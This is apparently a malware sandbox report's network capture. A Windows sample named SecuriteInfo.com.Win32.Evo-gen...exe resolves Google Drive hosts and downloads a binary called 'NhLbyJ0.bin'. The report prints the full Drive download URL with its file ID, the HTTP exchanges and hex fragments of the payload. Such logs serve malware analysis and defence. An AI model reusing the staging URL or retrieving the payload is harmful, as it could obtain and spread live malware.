                                                        Feb 18, 2025 05:29:25.683872938 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.683896065 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.683917046 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.684494972 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.684583902 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.684642076 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.684657097 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.684801102 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.684994936 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.685060024 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.685074091 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.685123920 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.685136080 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.685179949 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.685234070 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.685286045 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.685297966 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.685342073 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.685425997 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.685440063 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.685486078 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.685942888 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.686309099 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.686371088 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.686387062 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.686491966 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.686532974 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.686542988 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.686564922 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.686588049 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.686605930 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.687346935 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.687439919 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.687480927 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.687537909 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.687537909 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.687557936 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.687601089 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.688839912 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.692286015 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.692301989 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.692358971 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.693618059 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.693690062 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.693703890 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.696275949 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.698662043 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.699295998 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.699310064 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.700526953 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.704417944 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.704499960 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.704514980 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.708360910 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.708689928 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.711873055 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.711899042 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.711951017 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.713551998 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.713640928 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.713640928 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.713658094 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.713707924 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.713722944 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.713965893 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.718158960 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.720834017 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.720848083 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.720900059 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.722107887 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.724322081 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.724338055 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.724395037 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.726386070 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.726452112 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.726466894 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.726519108 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.730026007 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.732357979 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.732372046 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.732423067 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.734561920 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.734695911 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.734708071 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.735084057 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.752665997 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.756386042 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.782774925 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.782871008 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.782915115 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.782918930 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.782919884 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.782938957 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.782968998 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.782988071 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.782999039 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783056974 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783097029 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783122063 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783135891 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783181906 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783190966 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783206940 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783240080 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783262014 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783274889 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783343077 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783355951 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783404112 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783409119 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783423901 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783457994 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783478022 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783500910 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783535957 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783576965 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783586979 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783601046 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783636093 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783657074 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783659935 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783672094 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.783737898 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783737898 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.783756971 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.784672022 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.785748959 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.787977934 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.788018942 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.788033962 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.788059950 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.788083076 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.788093090 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.788309097 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.790537119 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.790606976 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.790620089 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.792217016 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.792293072 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.792308092 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.794527054 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.794589043 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.794603109 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.794652939 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.796521902 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.798680067 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.798726082 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.798751116 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.798765898 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.798791885 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.798825979 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.800916910 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.801630974 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.801644087 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.801692009 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.803338051 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.804296970 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.804311037 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.805340052 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.805408955 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.805423021 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.807423115 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.807483912 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.807499886 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.807545900 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.809448957 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.811722994 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.811737061 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.811881065 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.812127113 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.812223911 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.812237024 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.812297106 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.813661098 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.815635920 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.815673113 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.815692902 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.815715075 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.816607952 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.816620111 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.817941904 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.818003893 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.818017960 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.819755077 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.819820881 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.819834948 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.820271015 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.821706057 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.823801994 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.823841095 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.823864937 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.823887110 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.823909998 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.823935986 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.825927973 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.825994968 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.826050043 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.826065063 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.827877045 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.843883038 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.843974113 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844016075 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844072104 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.844089985 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844116926 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.844145060 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844194889 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844197989 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.844225883 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844252110 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.844273090 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844274998 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.844290018 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844340086 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.844355106 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844405890 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844436884 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.844456911 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844477892 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.844547987 CET44349796216.58.212.129192.168.2.4
                                                        Feb 18, 2025 05:29:25.844609022 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.853188992 CET49796443192.168.2.4216.58.212.129
                                                        Feb 18, 2025 05:29:25.853214979 CET44349796216.58.212.129192.168.2.4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 18, 2025 05:29:21.147430897 CET6441553192.168.2.41.1.1.1
                                                        Feb 18, 2025 05:29:21.154531002 CET53644151.1.1.1192.168.2.4
                                                        Feb 18, 2025 05:29:22.289282084 CET5053753192.168.2.41.1.1.1
                                                        Feb 18, 2025 05:29:22.299707890 CET53505371.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Feb 18, 2025 05:29:21.147430897 CET192.168.2.41.1.1.10x7f17Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Feb 18, 2025 05:29:22.289282084 CET192.168.2.41.1.1.10x7d08Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Feb 18, 2025 05:29:21.154531002 CET1.1.1.1192.168.2.40x7f17No error (0)drive.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                        Feb 18, 2025 05:29:22.299707890 CET1.1.1.1192.168.2.40x7d08No error (0)drive.usercontent.google.com216.58.212.129A (IP address)IN (0x0001)false
                                                        • drive.google.com
                                                        • drive.usercontent.google.com
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449787142.250.186.1424437880C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-02-18 04:29:21 UTC216OUTGET /uc?export=download&id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2025-02-18 04:29:22 UTC1610INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Tue, 18 Feb 2025 04:29:22 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-rSqzu9xJ20sTG6LY9NXMdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449796216.58.212.1294437880C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-02-18 04:29:22 UTC258OUTGET /download?id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2025-02-18 04:29:25 UTC5014INHTTP/1.1 200 OK
                                                        X-GUploader-UploadID: AHMx-iGgXDe9_A5-BTEyc1_ty-CZODMx7cL2afolDYKtsu3J4YDsFmt_xdRVN5f78TGN0ZXacrutjLg
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="NhLbyJ0.bin"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 208448
                                                        Last-Modified: Tue, 18 Feb 2025 00:54:16 GMT
                                                        Date: Tue, 18 Feb 2025 04:29:25 GMT
                                                        Expires: Tue, 18 Feb 2025 04:29:25 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=ydsSEA==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2025-02-18 04:29:25 UTC5014INData Raw: 3d eb 9e ed 4d 32 b0 47 9c da a4 d7 4b 7d 05 59 30 08 64 7c b0 2b a4 40 c8 86 86 3e 77 68 cd 49 3b 04 20 02 b2 38 d0 26 c8 dd d2 07 62 84 4d b2 76 74 51 73 ef 7b 9f bd 84 75 64 f4 2a d5 7e af 46 68 67 9e a3 09 a5 1e 1b c3 87 90 86 66 91 e2 fe 37 42 de 01 89 17 89 78 92 49 3e 47 e7 f7 88 4b 8f 3b fd 00 cc 19 57 91 01 67 50 53 9b 6f b1 54 cd 49 30 3b 5b 7e 48 9b 2e b7 ab 71 c6 5b 1c 64 b3 da 10 57 97 d5 75 68 af 2c 07 c0 d4 18 00 40 d0 e8 39 18 71 d7 27 71 ff 46 4d db 79 49 41 4e f8 39 59 bf cc 5a 98 be 18 64 61 80 39 77 67 bf ed 8f 3f 2c 6d 51 ab d6 43 74 e7 a8 70 b6 ca ff e6 c1 d5 73 67 da 5e 7e 98 0b 7d c4 39 f8 af 3d c0 0c 64 5c f9 35 6b 77 4b 71 c1 35 48 1a 8c 08 43 03 d4 8e 89 0e f5 33 a0 4a da f8 24 d7 63 43 0d 66 07 dd fd d9 aa 5c 57 c9 d2 c8 e4 ff
                                                        Data Ascii: =M2GK}Y0d|+@>whI; 8&bMvtQs{ud*~Fhgf7BxI>GK;WgPSoTI0;[~H.q[dWuh,@9q'qFMyIAN9YZda9wg?,mQCtpsg^~}9=d\5kwKq5HC3J$cCf\W
                                                        2025-02-18 04:29:25 UTC4668INData Raw: cd f0 8a 9f 08 be 8d 3c 48 74 cb e1 7e 02 41 9e 22 0d 60 69 30 52 ef ae 42 50 de 77 80 0e c1 ca 62 d0 25 1c b4 7b 44 5e e9 91 8e bc cd dd a7 79 70 1c ad 08 ed f2 86 08 a6 29 a1 8f 49 30 e0 6b ad cd a8 28 35 e2 4a 47 00 42 b7 b8 b6 1f f6 73 75 1d 9c a2 9d 8b 65 89 1f 0d 82 b1 30 5f 01 7a c7 e4 b9 fb 74 03 9a 0d 14 2d aa 6c 4b 17 48 8c 4b 37 1c 12 1d 17 f8 b7 a2 95 5c 6c 42 b0 9f f6 e5 34 63 8e 82 66 d8 df 35 68 40 c8 c4 e8 b5 21 a8 3a 5f e6 bf df 91 cb 44 10 69 db 3e fa 6a 87 e3 91 91 1a ef d0 d8 5f c3 0a 62 8a 7f 88 27 2b 0f b7 98 ea 62 4f ff 06 d8 58 d7 c1 4c 08 ff a8 d1 3e ad b3 16 d7 06 58 c2 2a 8b 12 6b 18 ec 7d 8f 3a 4e 8c 08 54 d5 4f 0f 5a dc 48 b1 36 0f d5 ae b3 f9 bc 66 93 b5 14 ff f6 a6 0c 68 2b 7f d2 88 f7 94 79 83 bb d0 b0 0e 08 6e 29 4a 87 f2
                                                        Data Ascii: <Ht~A"`i0RBPwb%{D^yp)I0k(5JGBsue0_zt-lKHK7\lB4cf5h@!:_Di>j_b'+bOXL>X*k}:NTOZH6fh+yn)J
